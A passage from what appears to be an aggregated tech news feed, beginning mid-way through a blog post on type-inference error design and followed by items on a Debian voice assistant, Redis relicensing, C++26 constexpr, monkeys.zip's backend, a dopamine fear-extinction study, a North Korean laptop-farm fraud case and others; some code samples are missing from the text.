. This code has a conflict, but there’s no way to know which half the user intended and which half is the mistake. If the user were able to provide an explicit type for
t
, they could indicate which one they meant and thus narrow down the error.
In PolySubML, type error messages will suggest adding an explicit type annotation to an inference variable if possible, which means that there needs to be a way for the user to supply explicit type annotations for any sort of inference variable, including those generated by generic function instantiation. And this means we need syntax for explicit instantiation.
Since Ocaml doesn’t have any syntax for this, I had to make up my own for PolySubML. In PolySubML, you can explicitly instantiate polymorphic types by putting the types in square brackets after the expression, e.g.
f[t=int]
,
f[t=float]
,
f[t=str -> bool]
, etc.
And thus, the above code results in the following error message:
TypeError: Value is required to have type float here:
let f = fun (type t) (x: t): t -> x;
let _: float = f 42;
^~~~~
However, that value may have type int originating here:
let f = fun (type t) (x: t): t -> x;
let _: float = f 42;
^~
Hint: To narrow down the cause of the type mismatch, consider adding an explicit type annotation here:
let f = fun (type t) (x: t): t -> x;
let _: float = f[t=_] 42;
+++++
Rule 4b: Allow the user to write explicit type annotations
In the previous section, we saw that you have to be careful to ensure that your language syntax offers a place to add explicit type annotations where necessary. However, that’s not the only thing that can make it impossible for users to add type annotations.
A much more common problem is that many languages don’t have
syntax for writing the types
themselves. For example, consider the following Rust code:
fnmain(){letx=42;letf:_/* ??? */=|y|x+y;f(23);}
This code compiles and works just fine. However,
there is no possible type annotation you could add
to
f
(the part marked
???
) and still have your code compile (at least not without using the Nightly compiler and opting into unstable features).
The problem is that Rust has types which exist
in the type system
but for which
there is no syntax to actually write the type
. This means that your code works
as long as the types are inferred
. However since there is no way to actually
write
the types you are using, you’re completely stuck as soon as you need to add explicit type annotations.
Async streams are especially bad here because a) they tend to have complicated types, especially if you chain multiple stream operations and b) it is normally impossible to write any of the types involved. Debugging errors in Rust code using async streams is an exercise in frustration, which normally consists of staring at the code and making random adjustments until something compiles.
One time, I wasted considerable time attempting to add explicit type annotations to narrow down the cause of a type error in some stream code I was working on. I even tried breaking it up and adding
Box
es so I could use
dyn Trait
, and I
still
wasn’t able to get it working with explicit types and still had no idea what the cause of the original compile error was. I ended up having to completely rewrite the code in question to stop using streams at all since it was impossible to debug compile errors.
But enough ranting. The point here is that you shouldn’t do this.
Any type that can be inferred must also be possible to write explicitly
.
It’s harder than you might think
Avoiding putting
deliberately
unwritable types into your language the way Rust did is a good first step. However, that’s not enough by itself, because it is very easy to
accidentally
have unwriteable types as well.
The requirement that every inferrable type also be possible to express explicitly means that the typechecker can’t have any
special powers
that let it do things which can’t be done in the type syntax. There’s a constant temptation to say “oh lets just add this one extra analysis to the typechecker, that will solve a common pain point and allow more correct code to compile.” But unless you
also
add corresponding explicit type syntax (which you usually won’t, because that makes the language “more complicated”), you’ve just broken this rule.
An accidental violation
In fact, even if you’re deliberately trying to follow this rule, it is still very easy to break if you aren’t careful.
During the design of PolySubML, this rule was a major consideration, and I even went so far as to add an extra feature (type unions and intersections) to the type syntax just to make necessary types expressible in one specific edge case. And even despite that, I
still
messed it up!
In the original release of PolySubML, the following code compiled:
This code doesn’t have any actual
type conflicts
, so what’s the problem? The problem is that it is inferring a type that can’t be written.
Specifically, there is no annotation that could be written for field
v
on the first line (where the
???
is). The
inferred
type for
v
is
(`Some t)
, where
t
is the abstract type created by the pattern match on line 2. However, since
t
is only
defined
on line 2, there is no way for the user to explicitly write it in an annotation on line 1. The compiler is inferring a type that can’t be written, exactly what I tried so hard to avoid!
Therefore, I had to modify PolySubML in order to ensure that it can only infer
types that were in scope at the point of the inference variable being inferred
in order to guarantee that the user could explicitly write that type at that point if they wanted to. Compiling the same code in PolySubML today instead results in a type error, thus satisfying rule 4.
Rule 5: Do not include static type inference in your runtime execution model
I won’t say much here because I already wrote
an entire blog post on the topic
, but I figured I should mention this here for completeness, because it is another common design issue that causes type inference to behave in complex and surprising ways, and thus contributes to the bad reputation of type inference.
Conclusion
Type inference has a reputation for confusing and impossible-to-debug type errors. However, there is no reason why it has to be this way. If you design your language in the right way, you can still have high quality type errors even with powerful global type inference. This does mean avoiding certain features which are often convenient, but I think in the long run, having high quality error messages in your language is the superior tradeoff.
Jonathan McDowell: Local Voice Assistant Step 2: Speech to Text and back
PlanetDebian
www.earth.li
2025-05-01 19:05:51
Having setup an ATOM Echo Voice Satellite and hooked it up to Home Assistant we now need to actually do something with the captured audio. Home Assistant largely deals with voice assistants using the Wyoming Protocol, which describes itself as essentially JSONL + PCM audio. It works nicely in terms ...
Having setup an
ATOM Echo Voice Satellite
and hooked it up to
Home Assistant
we now need to actually do something with the captured audio. Home Assistant largely deals with voice assistants using the
Wyoming Protocol
, which describes itself as essentially JSONL + PCM audio. It works nicely in terms of meaning everything can exist as separate modules that then just communicate over network sockets, and there are a whole bunch of Python implementations of the pieces necessary.
The first bit I looked at was speech to text; how do I get what I say to the voice satellite into something that Home Assistant can try and parse? There is a nice self contained speech recognition tool called
whisper.cpp
, which is a low dependency implementation of inference using
OpenAI’s Whisper
model. This is wrapped up for Wyoming as part of
wyoming-whisper-cpp
. Here we get into something that unfortunately seems common in this space; the repo contains a forked copy of whisper.cpp with enough differences that I couldn’t trivially make it work with regular whisper.cpp. That means missing out on new development, and potential improvements (the fork appears to be at v1.5.4, upstream is up to v1.7.5 at the time of writing). However it was possible to get up and running easily enough.
[I note there is a
Wyoming Whisper API client
that can use the whisper.cpp server, and that might be a cleaner way to go in the future, especially if whisper.cpp ends up in Debian.]
I stated previously I wanted all of this to be as clean an installed on Debian stable as possible. Given most of this isn’t packaged, that’s meant I’ve packaged things up as I go. I’m not at the stage anything is suitable for upload to Debian proper, but equally I’ve tried to make them a reasonable starting point. No pre-built binaries available, just
Salsa
git repos.
https://salsa.debian.org/noodles/wyoming-whisper-cpp
in this case. You need
python3-wyoming
from trixie if you’re building for bookworm, but it doesn’t need rebuilt.
You need a Whisper model that’s been converts to ggml format; they can be found on
Hugging Face
. I’ve ended up using the
base.en
model. I found
small.en
gave more accurate results, but took a little longer, when doing random testing, but it doesn’t seem to make much of a difference for voice control rather than plain transcribing.
[One of the open questions about uploading this to Debian is around the use of a prebuilt AI model. I don’t know what the right answer is here, and whether the voice infrastructure could ever be part of Debian proper, but the current discussion on the
interpretation of the DFSG on AI models
is very relevant.]
I run this in the same container as my Home Assistant install, using a systemd unit file dropped in
/etc/systemd/system/wyoming-whisper-cpp.service
:
It needs the
Wyoming Protocol integration
enabled in Home Assistant; you can “Add Entry” and enter localhost + 10030 for host + port and it’ll get added. Then in the Voice Assistant configuration there’ll be a
whisper.cpp
option available.
Text to speech turns out to be weirdly harder. The right answer is something like
Wyoming Piper
, but that turns out to be hard on bookworm. I’ll come back to that in a future post. For now I took the easy option and used the built in “Google Translate” option in Home Assistant. That needed an extra stanza in
configuration.yaml
that wasn’t entirely obvious:
With this, and the ATOM voice satellite, I could now do basic voice control of my Home Assistant setup, with everything except the text-to-speech piece happening locally! Things such as “Hey Jarvis, turn on the study light” work out of the box. I haven’t yet got into defining my own phrases, partly because I know some of the things I want (“What time is it?”) are already added in later Home Assistant versions than the one I’m running.
Overall I found this initially complicated to setup given my self-imposed constraints about actually understanding the building blocks and compiling them myself, but I’ve been pretty impressed with the work that’s gone into it all. Next step, running a voice satellite on a Debian box.
Redis is now available under the AGPLv3 open source license (Redis blog)
Linux Weekly News
lwn.net
2025-05-01 18:47:25
After a somewhat tumultuous switch to the
Server Side Public License (SSPL) in March 2024, Redis has backtracked
and is now offering Redis under the
Affero GPLv3 (AGPLv3) starting with Redis 8, CEO Rowan Trollope
announced. The change back to an open-source license was led by Redis creator Sal...
I'll be honest: I truly wanted the code I wrote for the new Vector Sets data type to be released under an open source license. Writing open source software is too rooted in me: I rarely wrote anything else in my career. I'm too old to start now. This may be childish, but I wrote Vector Sets with a huge amount of enthusiasm exactly because I knew Redis (and my new work) was going to be open source again.
I understand that the core of our work is to improve Redis, to continue building a good system, useful, simple, able to change with the requirements of the software stack. Yet, returning back to an open source license is the basis for such efforts to be coherent with the Redis project, to be accepted by the user base, and to contribute to a human collective effort that is larger than any single company. So, honestly, while I can't take credit for the license switch, I hope I contributed a little bit to it, because today I'm happy. I'm happy that Redis is open source software again, under the terms of the AGPLv3 license.
Since last year's license switch, though, the
Valkey
project has sprung up as a fork under
the original 3-clause BSD license.
Last week, we discussed
language features that are becoming
constexpr
in C++26
. Today, let’s turn our attention to the standard library features that will soon be usable at compile time. One topic is missing: exceptions. As they need both core language and library changes, I thought they deserved their own post.
This paper proposes making
std::stable_sort
,
std::stable_partition
,
std::inplace_merge
, and their
ranges
counterparts usable in constant expressions. While many algorithms have become
constexpr
over the years, this family related to stable sorting had remained exceptions — until now.
The recent introduction of
constexpr
containers gives extra motivation for this proposal. If you can construct a container at compile time, it’s only natural to want to sort it there, too. More importantly, a
constexpr std::vector
can now support efficient, stable sorting algorithms.
A key question is whether the algorithm can meet its computational complexity requirements under the constraints of constant evaluation. Fortunately,
std::is_constant_evaluated()
provides an escape hatch for implementations. For deeper details, check out the
proposal
itself.
P1383R2
: More
constexpr
for
<cmath>
and
<complex>
While
P0533
made many
<cmath>
and
<cstdlib>
functions
constexpr
-friendly in C++23, it only addressed functions with trivial behavior — those no more complex than the basic arithmetic operators.
Floating-point computations can yield different results depending on compiler settings, optimization levels, and hardware platforms. For instance, calculating
std::sin(1e100)
may produce varying outcomes due to the intricacies of floating-point arithmetic at such scales. The paper discusses these challenges and suggests that some variability in results is acceptable, given the nature of floating-point computations.
The proposal
accepts the need for a balance between strict determinism and practical flexibility. It suggests that while some functions should produce consistent results across platforms, others may inherently allow for some variability.
P3074R7
: trivial
union
s (was
std::uninitialized<T>
)
To implement static, in-place,
constexpr
-friendly containers like non-allocating vectors, you often need uninitialized storage — typically via
union
s. However, default behavior for special members of unions has been limiting: if not all alternatives are trivial, the special member is deleted. This presents a problem for
constexpr
code where a no-op destructor isn’t quite the same as a trivial one.
The road to solving this wasn’t short:
P3074R7
went through seven revisions and considered five possible solutions—including library-based approaches, new annotations, and even a new union type. Ultimately, the committee decided to just
make it work
with minimal changes to the user experience.
But how?
For unions, the default constructor - if there is no default member initializer - is always going to be trivial. If the first alternative is an implicit-lifetime time, it begins its life-time and becomes the active member.
The defaulted destructor is deleted if either the union has a user-provided default constructor or there exists a variant alternative that has a default member initializer and that member’s destructor is either deleted or inaccessible. Otherwise, the destructor is trivial.
This excerpt from the proposal shows the changes well.
Hana Dusíková authored
a massive proposal
that boils down to a simple goal: make (almost) all containers and adaptors
constexpr
.
Up until now, only a handful of them were
constexpr
-friendly (
std::vector
,
std::span
,
std::mdspan
,
std::basic_string
and
std::basic_string_view
). From now on, the situation will be flipped. Almost everything will be
constexpr
-friendly. There is one exception and one constraint:
std::hive
is not included, because it doesn’t have a stable wording yet
if you want to use unordered containers at compile-time, you must provide your own hashing facility, because
std::hash
cannot be made
constexpr
-friendly due to its requirements. Its result is guaranteed to be consistent only with the duration of the program.
Happy days!
P3508R0
: Wording for “
constexpr
for specialized memory algorithms”
Such a strange title, isn’t? Wording for
something
…
As it turns out, there was already a paper accepted (
P2283R2
) making specialized memory algorithms
constexpr
-friendly. Algorithms that are essential for implementing
constexpr
container support, yet they were forgotten from C++20.
These algorithms are (both in
std
and in
std::ranges
namespaces):
uninitialized_value_construct
uninitialized_value_construct_n
uninitialized_copy
uninitialized_copy_result
uninitialized_copy_n
uninitialized_copy_n_result
uninitialized_move
uninitialized_move_result
uninitialized_move_n
uninitialized_move_n_result
uninitialized_fill
uninitialized_fill_n
When the paper was made, the necessary implementation change was to use
std::construct_at
instead of
placement new
, as
std::consturct_at
was already
constexpr
. But in the meantime,
P2747R2
was accepted and
placement new
in the core language also became
constexpr
. Therefore, the implementation of the above functions doesn’t have to be changed, only their signatures have to be updated to support
constexpr
. Hence, the wording change.
P3369R0
:
constexpr
for
uninitialized_default_construct
We saw that the
constexpr
placement new
affected
P2283R2
and raised the need for a wording change performed in
P3508R0
. But that’s not the only side-effect it had. From the above-listed algorithm families, one is missing:
uninitialized_default_construct
. The reason is that
uninitialized_default_construct
cannot be implemented with
std::construct_at
as it always performs value initialization, default initialization was impossible.
But with
constexpr
placement new
this is not an issue anymore, therefore
uninitialized_default_construct
can also be turned into
constexpr
.
Conclusion
C++26 marks a huge step forward for
constexpr
support in the standard library. From stable sorting algorithms to containers, from tricky union rules to specialised memory functions, compile-time programming is becoming more and more supported.
In the next article, we’ll cover compile-time exceptions!
It’s been one month since the
launch
of monkeys.zip. In that time, we’ve gathered over
11,000 monkeys
, which have written over
6 billion words
- completing well over
75%
of the words in Shakespeare’s works. In fact, they’ve
recently finished
writing every four-letter word!
While the initial hype has died down to a small trickle, the monkeys are still typing just as hard as ever, and I figured it’d be a good time to talk about how I built the site. If this part doesn’t interest you, check out
PART TWO
where I talk all about the monkey names!
This is a relatively small list of technologies - as I tend to make as much as possible from scratch on my side projects, out of stubbornness. In this project, for example, I made a state management library called
StateFarm
. It’s awful, don’t use it.
The first important design decision comes with the concept of
Ticks
. The backend produces data in
15-second long
batches. The above pipeline runs every 15 seconds, producing 15 seconds worth of monkey-text. This interval length was chosen as a tradeoff between reducing runtime of each step, making errors easier to retry and recover from, and spreading out DB load into smaller chunks, while reducing server <—> client bandwidth and requests.
Every 15 seconds, a cronjob calls a
generateTick
function - which has only one job - which is to put a new tick row in the
ticks
table.
Tick ID
Start Time
Seed
Status
1234
04:13:25
wn9837xw9873v
NEW
And that’s all it does! Keeping this step so simple and infallible is crucial to the reliability of later steps. If they fail, or there’s a huge data loss, everything can be rebuilt or retried as needed, as long as we have an entry in this table.
When a new tick is added to this table, the
generateTickText
is called via a WebHook. This function has the job of generating the text for each monkey for that 15-second tick.
We use
sfc32
to deterministically generate random numbers based on the seed, which is the tick seed, merged with the monkey seed. This strategy allows a very deterministic random monkey text generator, that can execute both server-side and client-side.
Once the text is generated, we drop it into a Storage bucket. This isn’t strictly necessary, but I like the transparency. For debugging or investigation purposes, it’s nice to be able to browse all the text that monkeys have written, without having to regenerate it.
When the text is dropped into Storage, another WebHook is called, which combs through the text and searches for matches against a dictionary. It builds an immense batch update do a number of Tables in our database
monkey_words
- Source of truth for every (valid) word every monkey has written
word_counts_cache
- Faster for lookups of a given word (EG “monkey” has appeared 100 times)
monkey_items
- Any items a monkey is earned is granted to this table
A more recent addition has been a separate cleanup script which runs on a cron job - the purpose of which is to archive old, short words from the
monkey_words
table and place them into a
monkey_words_archived
table - which drastically speeds up reads on
monkey_words
(which started slowing down at several billion rows).
The grid of monkeys is labeled into chunks of 64x64 - which hold almost no value, except for creating a minimum query size for monkeys while scrolling through the app - and allowing me to cache these chunks in Redis. During normal traffic, it’s actually slower (by over 100 ms) to fetch the cached result from Redis than just query the DB for it - but in the early days when the application was being battered by reddit, it was a lifesaver to be able to render the monkeys without the database needing to be responsive.
There’s still a fair amount of optimization that remains to be done. Now that we’re getting into the ‘diminishing returns’ portion of this project, I’d love to speed the monkey typing up, so that we can start carving through the 6 and 7 letter words, but that will require some further architectural changes. I’m largely considering getting a custom VPS with just a big bucket of RAM, and doing this all in-memory, for speed.
Dangers come but dangers also go and when they do, the brain has an “all-clear” signal that teaches it to extinguish its fear. A new study in mice by MIT neuroscientists shows that the signal is the release of dopamine along a specific interregional brain circuit. The research therefore pinpoints a potentially critical mechanism of mental health, restoring calm when it works, but prolonging anxiety or even post-traumatic stress disorder when it doesn’t.
“Dopamine is essential to initiate fear extinction,” said Michele Pignatelli di Spinazzola, co-author of the new study from the lab of senior author
Susumu Tonegawa
, Picower Professor of biology and neuroscience at the RIKEN-MIT Laboratory for Neural Circuit Genetics in The Picower Institute for Learning and Memory and an HHMI Investigator.
In 2020
Tonegawa’s lab showed
that learning to be afraid, and then learning when that’s no longer necessary, result from a competition between populations of cells in the brain’s amygdala region. When a mouse learns that a place is “dangerous” (because it gets a little foot shock there), the fear memory is encoded by neurons in the anterior of the basolateral amygdala (aBLA) that express the gene Rspo2. When the mouse then learns that a place is no longer associated with danger (because they wait there and the zap doesn’t recur), neurons in the posterior basolateral amygdala (pBLA) that express the gene Ppp1r1b encode a new fear extinction memory that overcomes the original dread. Notably those same neurons encode feelings of reward, helping to explain why it feels so good when we realize that an expected danger has dwindled.
In the new study, the lab, led by former members Xiangyu Zhang and Katelyn Flick, sought to determine what prompts these amygdala neurons to encode these memories. The rigorous set of experiments the team reports in the
Proceedings of the National Academy of Sciences
show that it’s dopamine sent to the different amygdala populations from distinct groups of neurons in the ventral tegmental area (VTA).
“Our study uncovers a precise mechanism by which dopamine helps the brain unlearn fear,” said Zhang, who also led the 2020 study and is now Senior Associate at Orbimed, a healthcare investment firm. “We found that dopamine activates specific amygdala neurons tied to reward, which in turn drive fear extinction. We now see that unlearning fear isn’t just about suppressing it—it’s a positive learning process powered by the brain’s reward machinery. This opens up new avenues for understanding and potentially treating fear-related disorders like PTSD.”
Forgetting fear
The VTA was the lab’s prime suspect to be the source of the signal because the region is well known for encoding surprising experiences and instructing the brain, with dopamine, to learn from them. The first set of experiments in the paper used multiple methods for tracing neural circuits to see whether and how cells in the VTA and the amygdala connect. They found a clear pattern: Rspo2 neurons were targeted by dopaminergic neurons in the anterior and left and right sides of the VTA. Ppp1r1b neurons received dopaminergic input from neurons in the center and posterior sections of the VTA. The density of connections was greater on the Ppp1r1b neurons than for the Rspo2 ones.
An edited version of a figure from the research shows the ventral tegmental area, highlighting dopamine-associated neurons in green and one that connects to the posterior amygdala (magnified in inset) in red.
The circuit tracing showed that dopamine is available to amygdala neurons that encode fear and its extinction, but do those neurons care about dopamine? The team showed that indeed they express “D1” receptors for the neuromodulator. Commensurate with the degree of dopamine connectivity, Ppp1r1b cells had more receptors than Rspo2 neurons.
Dopamine does a lot of things, so the next question was whether its activity in the amygdala actually correlated with fear encoding and extinction. Using a method to track and visualize it in the brain, the team watched dopamine in the amygdala as mice underwent a three-day experiment. On day one they went to an enclosure where they experienced three little zaps on the feet. On day two they went back to the enclosure for 45 minutes where they didn’t experience any new shocks –at first the mice froze in fear but then relaxed after about 15 minutes. On day 3 they returned again to test whether they had indeed extinguished the fear they showed at the beginning of day 2.
The dopamine activity tracking revealed that during the shocks on day 1, Rspo2 neurons had the larger response to dopamine, but in the early moments of day 2 when the anticipated shocks didn’t come and the mice eased up on freezing in fear, the Ppp1r1b neurons showed the stronger dopamine activity. More strikingly, the mice that learned to extinguish their fear most strongly also showed the greatest dopamine signal at those neurons.
Causal connections
The final sets of experiments sought to show that dopamine is not just available and associated with fear encoding and extinction, but also actually causes them. In one set, they turned to optogenetics, a technology that enables scientists to activate or quiet neurons with different colors of light. Sure enough, when they quieted VTA dopaminergic inputs in the pBLA, doing so impaired fear extinction. When they activated those inputs, it accelerated fear extinction. The researchers were surprised that when they activated VTA dopaminergic inputs into the aBLA they could reinstate fear even without any new foot shocks, impairing fear extinction.
The other way they confirmed a causal role for dopamine in fear encoding and extinction was to manipulate the amygdala neurons’ dopamine receptors. In Ppp1r1b neurons, overexpressing dopamine receptors impaired fear recall and promoted extinction, whereas knocking the receptors down impaired fear extinction. Meanwhile in the Rspo2 cells, knocking down receptors reduced the freezing behavior.
“We showed that fear extinction requires VTA dopaminergic activity in the pBLA Ppp1r1b neurons by using optogenetic inhibition of VTA terminals and cell-type-specific knockdown of D1 receptors in these neurons,” the authors wrote.
The scientists are careful in the study to note that while they’ve identified the “teaching signal” for fear extinction learning, the broader phenomenon of fear extinction occurs brainwide, rather than in just this single circuit.
But the circuit seems to be a key node to consider as drug developers and psychiatrists work to combat anxiety and PTSD, Pignatelli di Spinazzola said.
“Fear learning and fear extinction provide a strong framework to study generalized anxiety and PTSD,” he said. “Our study investigates the underlying mechanisms suggesting multiple targets for a translational approach such as pBLA and use of dopaminergic modulation.”
Marianna Rizzo is also a co-author of the study. Support for the research came from the RIKEN Center for Brain Science, the Howard Hughes Medical Institute, the Freedom Together Foundation and The Picower Institute for Learning and Memory.
It's understandable why the guys who had big tech startup successes in the 90s and early aughts think that "DEI" is the cause of all their problems. Not understandable in the "gotta hand it to em" sense, but in the sense that it's not hard to
follow
the stupid mistake they all make.
I didn't see any of this unfold, but I think I've pretty much seen it. 2005, old dorm room with mold on the walls, the birds start to chirp their alarm to the fact that you're up way too late. I can't argue with anyone who wants to say the place exudes "a masculine energy," or at least a masculine smell. I'm here because programming was the only career path for which, in the limited vision of my youth, I could already see and understand exactly what I'd be doing, and that there was very little I would need from anyone else to get there. I'd be very suprised if Marc Andreessen, Mark Zuckerberg, and James Damore don't know, and to this day yearn to recreate, the sensations I'm describing. They never find it again, because:
These men are no longer young. I'm not either. I still have Ideas, and I still think about what it would be like to crush it for a few weeks straight, alternating between coffee and beer, manifesting a vision. But... well, if you're still young, you'll find out soon enough, and otherwise, you know already that there are too many other things that need doing, because responsible people have responsibilities.
The Internet is no longer the world's great frontier, and the pool of unsatisfied wants that suddenly welled up as the world first came online is not what it once was. There once was no graphical operating system, no decent web browser, no search engine that could find what you were looking for. The basic amenities are now there. Of course there is still much room for innovation, but merely being able to write a computer program and understand what computer networks are good for is no longer the superpower it once was. If you're young enough to pound Red Bulls all night, you're probably not old enough to have the breadth of knowledge required to launch a great software product.
For those who happened upon great success, chance was a significant factor. First just being born into a little seed cash and enough comfort to go a while without working a straight job. As Julie says when someone repeats that Amazon was started in a garage: Ain't no garages in the trailer park. And as many said in the startup incubator we lovingly called the Bitcoin Basement, it takes a dozen miracles to launch a business successfully.
That you got lucky at a singular moment in history and now you're an old man is not an easy set of facts to accept. So I understand — that is, I see how — one can end up associating one's best years with superficial aspects of their circumstance. You had no responsibilities, no serious consequences for failure, and the freedom to be reckless and inconsiderate. You launched small new products that didn't require building a team. If you attended school, the vast majority of your fellow students were men, and they were more or less all the same person as you.
If these are the conditions under which passionate creative problem solving thrives, then of course we must recover them to make software great again. But they are not. We need look no further than the "hackathon," that sad facsimile of the days when we were all learning the basics so fast that the world could be ours with just a day or two of focused effort. Hype up an exciting atmosphere, assemble some folks with so few attachments in life that they have time to spend all weekend at a hackathon, and this ritual will summon up the old gods. The hackathon is the proof that people believe this can work, and it is the proof that it doesn't.
Maybe most of the critical things that can be created by one guy typing furiously are gone, and the opportunities that remain require expertise and wisdom from a bunch of different people. This is harder than spending all day every day doing your favorite thing and insisting that everyone else leave you alone. Often it's boring. Sometimes there's paperwork. You will have to have conversations with people you don't always understand right away. Your job evolves, and it turns out
not
to be exactly what you thought it would be like when you were a teenager.
Maybe, like Dennis Hopper's character in Hoosiers, you need to give up on trying to relive the glory days of being the high school basketball star, and start to accept and settle into your new responsibilities as a coach, a respectable father, and not being the town drunk.
Redis is open source again
Simon Willison
simonwillison.net
2025-05-01 18:19:36
Redis is open source again
Salvatore Sanfilippo:
Five months ago, I rejoined Redis and quickly started to talk with my colleagues about a possible switch to the AGPL license, only to discover that there was already an ongoing discussion, a very old one, too. [...]
I’ll be honest: I truly wanted the...
Five months ago, I rejoined Redis and quickly started to talk with my colleagues about a possible switch to the AGPL license, only to discover that there was already an ongoing discussion, a very old one, too. [...]
I’ll be honest: I truly wanted the code I wrote for the new Vector Sets data type to be released under an open source license. [...]
So, honestly, while I can’t take credit for the license switch, I hope I contributed a little bit to it, because today I’m happy. I’m happy that Redis is open source software again, under the terms of the AGPLv3 license.
I'm absolutely
thrilled
to hear this. Redis 8.0 is
out today under the new license
, including a beta release of
Vector Sets
. I've been watching Salvatore's work on those with
fascination
, while sad that I probably wouldn't use it often due to the janky license. That concern is now gone. I'm looking forward to putting them through their paces!
A tool to manage versioning and changelogs
with a focus on multi-package repositories
The
changesets
workflow is designed to help when people are making changes, all the way through to publishing. It lets contributors declare how their changes should be released, then we automate updating package versions, and changelogs, and publishing new versions of packages based on the provided information.
Changesets has a focus on solving these problems for multi-package repositories, and keeps packages that rely on each other within the multi-package repository up-to-date, as well as making it easy to make changes to groups of packages.
How do we do that?
A
changeset
is an intent to release a set of packages at particular
semver bump types
with a summary of the changes made.
The
@changesets/cli
package allows you to write
changeset
files as you make changes, then combine any number of changesets into a release, that flattens the bump-types into a single release per package, handles internal dependencies in a multi-package-repository, and updates changelogs, as well as release all updated packages from a mono-repository with one command.
If you want a detailed explanation of the concepts behind changesets, or to understand how you would build on top
of changesets, check out our
detailed-explanation
.
While changesets can be an entirely manual process, we recommend integrating it with how your CI works.
To check that PRs contain a changeset, we recommend using
the changeset bot
, or if you want to fail builds on a changesets failure, run
yarn changeset status
in CI.
To make releasing easier, you can use
this changesets github action
to automate creating versioning pull requests, and optionally publishing packages.
bolt
- Brought us a strong concept of how packages in a mono-repo should be able to interconnect, and provided the initial infrastructure to get inter-package information.
Atlassian
- The original idea/sponsor of the changesets code, and where many of the ideas and processes were fermented. It was originally implemented by the team behind
atlaskit
.
lerna-semantic-release
- put down many of the initial patterns around updating packages within a multi-package-repository, and started us thinking about how to manage dependent packages.
Thinkmill
- For sponsoring the focused open sourcing of this project, and the version two rearchitecture.
Picture of Millihertz 5 / Offspring in Februrary 2022
Millihertz 5 or 'Offspring' is a mechanical computer modelled on the Manchester small-scale experimental machine ('Baby'). It uses ball bearings as data elements. It has an 8x8 bit RAM and 8-bit datapath with subtractor and accumulator. It is currently under construction. There are some design documents available: a PDF:
Offspring PDF
or Pandoc-rendered HTML:
Offspring HTML
.
Log entries for this project
Millihertz 5 Progress August 2022
2022-08-21
Millihertz 5 Progress April 2020
2020-04-10
Mechanical replica of the Manchester SSEM (Baby)
2018-05-10
Waypoint is transforming urban planning through automation, helping cities plan more efficiently, affordably, and effectively. In the U.S., cities often rely heavily on consulting firms for routine planning tasks—tasks that are frequently repetitive, costly, and algorithmic in nature.
Our mission is to empower cities with automated planning solutions, enabling them to rapidly design sustainable, resilient, and human-centric urban environments.
Waypoint is on a mission to automate urban planning, enabling cities to rapidly design in ways that are sustainable, resilient, and human-centric. Most U.S. cities rely heavily on consultants for planning documents. But if you take a closer look at where most of the hours are spent, you find planners and engineers repeatedly performing manual data entry, manipulation, and visualization. Despite nationwide similarities across studies, consulting firms haven't significantly improved their efficiency. We believe AI can automate many of these repetitive workflows, reducing costs and expanding city capacity.
We’re well-funded, growing rapidly, and already working with multiple cities. As our first hire, you’ll work closely with both founders.
Must Haves
We’re looking for a high-performing, ambitious individual with strong attention to detail.
Software experience:
You are a strong programmer, with an engineering degree or work experience, and you have the ability to quickly learn new languages, tools, and workflows.
Eager learner:
You're excited to continuously grow, learning new topics and skills alongside the company.
Comfortable with ambiguity:
You'll frequently tackle unfamiliar tasks, such as reading detailed planning documents or understanding roadway regulations.
Customer-focused:
You consistently consider customer perspectives and go the extra mile to ensure an exceptional experience.
Relentless problem solver:
When challenges arise, you push through them creatively to find solutions. You’re a self-starter who can figure things out.
Nice to Haves
Experience with AI and/or classic computer vision models (Python).
Familiarity with web development (we use NextJS).
Experience with GIS or geospatial data.
Previous exposure to traffic engineering or city planning.
Genuine passion for improving urban planning processes.
The Role
As our first engineering hire (besides us), you'll help define our engineering systems from scratch. Example projects include:
Fine-tuning YOLO models to segment sidewalks and intelligently handle gaps caused by tree cover.
Developing a "deep research" system designed specifically for processing city planning documents.
Orchestrating AI agents to automatically generate intersection safety recommendations aligned with industry best practices.
Automating the creation of visually appealing city planning reports.
Deploying and maintaining our own OpenStreetMap server and Streetmix fork.
This role is in-person and in San Francisco. Please note that as an early-stage startup, we often end up working nights and weekends.
Arizona laptop farmer pleads guilty for funneling $17M to Kim Jong Un
An Arizona woman who created a "laptop farm" in her home to help fake IT workers pose as US-based employees has pleaded guilty in a scheme that generated over $17 million for herself... and North Korea.
Christina Marie Chapman pleaded guilty to conspiracy to commit wire fraud, aggravated identity theft, and conspiracy to launder monetary instruments in a US District Court on Tuesday.
She is scheduled to be sentenced on June 16, and under the terms of her plea deal, all parties will recommend the court put her behind bars for between 94 and 111 months. Chapman was
arrested
in May.
According to
court documents
, Chapman ran a laptop farm out of her home from October 2020 to October 2023. During this time she hosted computers for overseas IT workers — who were posing as American citizens and residents — to ensure the devices had local IP addresses, making them appear to be in the US.
Chapman also helped the foreign fraudsters steal the identities of more than 70 US nationals, then use those identities to apply for remote IT jobs, according to the Feds.
Those who successfully obtained employment as part of the scam then received payroll checks at Chapman's home with direct deposits sent to her US bank accounts before ultimately being laundered and funneled to North Korea, and then potentially contributing to the DPRK's
weapons programs
, the court document says.
It's unclear how much of the ill-gotten gains Chapman pocketed, but according to the Justice Department, Chapman's overseas IT workers received
more than $17.1 million
for their work. Much of the income was falsely reported to the IRS and Social Security Administration in the names of real US individuals whose identities had been stolen.
Some of the overseas workers were hired at Fortune 500 companies, including a top-five television network, a premier Silicon Valley technology company, an aerospace and defense manufacturer, an American car manufacturer, a luxury retail chain, and a US-hallmark media and entertainment company.
The Norks specifically targeted some of these companies, likely for their sensitive IP and other valuable data in addition to providing a paycheck, and even "maintained postings for companies at which they wanted to insert IT workers," according to the DOJ.
In total, more than 300 US companies were scammed, and more than 70 people had false tax liabilities created in their name. Additionally, phony documents were submitted to the Department of Homeland Security on more than 100 occasions.
These types of scams have netted Pyongyang at least
$88 million
over six years. Earlier this week,
The Register
interviewed someone who was
twice targeted
. In both cases, the fraudsters used AI-based tools during video interviews with — wait for it — a security startup using AI to find vulnerabilities. ®
Ravdess has only two texts: "Dogs are sitting by the door." for prompt text, and "Kids are talking by the door." for synthesis text. The following results for NaturalSpeech 3, NaturalSpeech 2, Voicebox (R), VALL-E (R), Mega-TTS 2, StyleTTS 2, and HierSpeech++ are taken from the official
NaturalSpeech 3 demo page
. (R) indicates that these are reproduced by NaturalSpeech 3.
Fivetran becomes the only fully managed platform that can move trusted, governed data in any direction, powering real-time decisions, AI, and business operations.
